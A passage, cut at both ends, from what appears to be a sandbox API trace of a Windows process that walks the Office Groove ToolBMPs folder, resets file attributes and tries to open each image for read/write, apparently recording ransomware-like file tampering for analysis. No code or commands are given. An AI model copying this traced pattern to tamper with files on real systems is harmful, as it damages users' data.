dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.870] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.870] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMask.bmp", dwFileAttributes=0x80) returned 0 [0136.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.871] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.871] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp", dwFileAttributes=0x80) returned 0 [0136.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmaskrtl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.872] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.872] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.873] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.873] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.874] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.874] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.875] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.875] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.876] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.876] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg", dwFileAttributes=0x80) returned 0 [0136.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questionicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.876] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.876] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIconMask.bmp", dwFileAttributes=0x80) returned 0 [0136.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questioniconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.877] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg", dwFileAttributes=0x80) returned 0 [0136.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.878] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.878] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.878] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.878] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.879] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg", dwFileAttributes=0x80) returned 0 [0136.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24images.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.879] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24imagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.880] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\SketchIconImages.bmp", dwFileAttributes=0x80) returned 0 [0136.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\SketchIconImages.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\sketchiconimages.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.881] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg", dwFileAttributes=0x80) returned 0 [0136.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupicons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.881] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupiconsmask.bmp", dwFileAttributes=0x80) returned 0 [0136.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupiconsmask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupiconsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.882] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.882] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.882] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.882] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\STOPICON.JPG", dwFileAttributes=0x80) returned 0 [0136.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\STOPICON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.883] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\StopIconMask.bmp", dwFileAttributes=0x80) returned 0 [0136.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\StopIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopiconmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.884] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp", dwFileAttributes=0x80) returned 0 [0136.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimages256colors.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.885] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp", dwFileAttributes=0x80) returned 0 [0136.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.885] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg", dwFileAttributes=0x80) returned 0 [0136.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.886] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.887] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg", dwFileAttributes=0x80) returned 0 [0136.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\verisignlogo.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.887] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.888] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.888] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg", dwFileAttributes=0x80) returned 0 [0136.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimages16x16.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.889] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImagesMask16x16.bmp", dwFileAttributes=0x80) returned 0 [0136.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImagesMask16x16.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimagesmask16x16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 